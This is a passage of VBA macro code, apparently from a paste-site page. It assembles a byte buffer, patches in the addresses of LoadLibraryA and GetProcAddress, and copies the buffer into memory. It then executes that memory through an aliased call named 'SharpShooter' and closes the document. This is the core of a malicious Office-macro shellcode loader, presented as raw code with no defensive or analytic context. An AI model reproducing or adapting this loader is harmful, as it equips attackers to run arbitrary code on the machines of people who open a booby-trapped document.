  62. binbuffer(size_count) = eValue
  63. size_count = size_count + 1
  64. Next eIndex2
  65. Next eIndex1
  66. '``````````````````````````````````````````````````````````````````````````````````
  67. Result = RtlMoveMemory(VarPtr(binbuffer(1265)), addr_LoadLibraryA, 8)
  68. Result = RtlMoveMemory(VarPtr(binbuffer(1283)), addr_GetProcAddr, 8)
  69.  
  70. '``````````````````````````````````````````````````````````````````````````````````
  71. For eIndex1 = 0 To size_count - 1
  72. eValue = binbuffer(eIndex1)
  73. Result = RtlMoveMemory(vAddress + eIndex1, eValue, 1)
  74. Next eIndex1
  75. Dim LMCooperator As Long
  76. LMCooperator = SharpShooter(vAddress, 0, 0)
  77. ThisDocument.Close
  78. Exit Sub
  79. LoneSpirit:
  80. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement